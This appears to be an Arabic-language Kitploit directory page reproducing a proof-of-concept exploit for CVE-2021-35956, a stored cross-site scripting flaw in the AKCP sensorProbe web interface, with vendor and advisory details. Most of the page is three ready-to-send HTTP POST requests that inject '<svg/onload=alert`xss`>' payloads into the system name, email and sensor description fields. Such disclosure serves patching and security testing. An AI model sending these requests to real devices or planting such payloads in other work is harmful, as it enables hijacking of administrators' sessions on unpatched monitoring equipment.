Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-35956 — استغلال إثبات المفهوم لـ CVE-2021-35956، AKCP sensorProbe - ثغرات 'متعددة' للبرمجة النصية عبر المواقع (XSS) | Kitploit
أدوات/GitHubGitHub/tcbutler320/cve-2021-35956
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubtcbutler320/cve-2021-35956

CVE-2021-35956

استغلال إثبات المفهوم لـ CVE-2021-35956، AKCP sensorProbe - ثغرات 'متعددة' للبرمجة النصية عبر المواقع (XSS)

عرض المستودع
1منذ 5 سنواتلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-35956.

إثبات مفهوم استغلال لـ CVE-2021-35956، AKCP sensorProbe - 'Multiple' ثغرة البرمجة النصية عبر المواقع (XSS).

عنوان الاستغلال: AKCP sensorProbe - 'Multiple' ثغرة البرمجة النصية عبر المواقع (XSS).
التاريخ: 07-01-2021.
مؤلف الاستغلال: Tyler Butler.
الموقع الرسمي للبائع: https://www.akcp.com/.
رابط البرنامج: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/.
الإشعار الأمني: https://tbutler.org/2021/06/28/cve-2021-35956.
الإصدار: < SP480-20210624.
CVE: CVE-2021-35956.

الوصف: تتيح ثغرة البرمجة النصية عبر المواقع المخزنة (XSS) في خادم الويب المدمج لـ AKCP sensorProbe قبل الإصدار SP480-20210624 للمهاجمين المصادق عليهم عن بُعد إدخال JavaScript عشوائي عبر حقول وصف المستشعر والبريد الإلكتروني (من/إلى/نسخة) واسم النظام وموقع النظام.

  1. ثغرة البرمجة النصية عبر المواقع المخزنة عبر إعدادات النظام
root@kitploit:~
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
  1. ثغرة البرمجة النصية عبر المواقع المخزنة عبر إعدادات البريد الإلكتروني
root@kitploit:~
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close


[email protected]&[email protected]&[email protected]&[email protected]&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
  1. ثغرة البرمجة النصية عبر المواقع المخزنة عبر وصف المستشعر
root@kitploit:~
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close

_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
تنزيل الأداة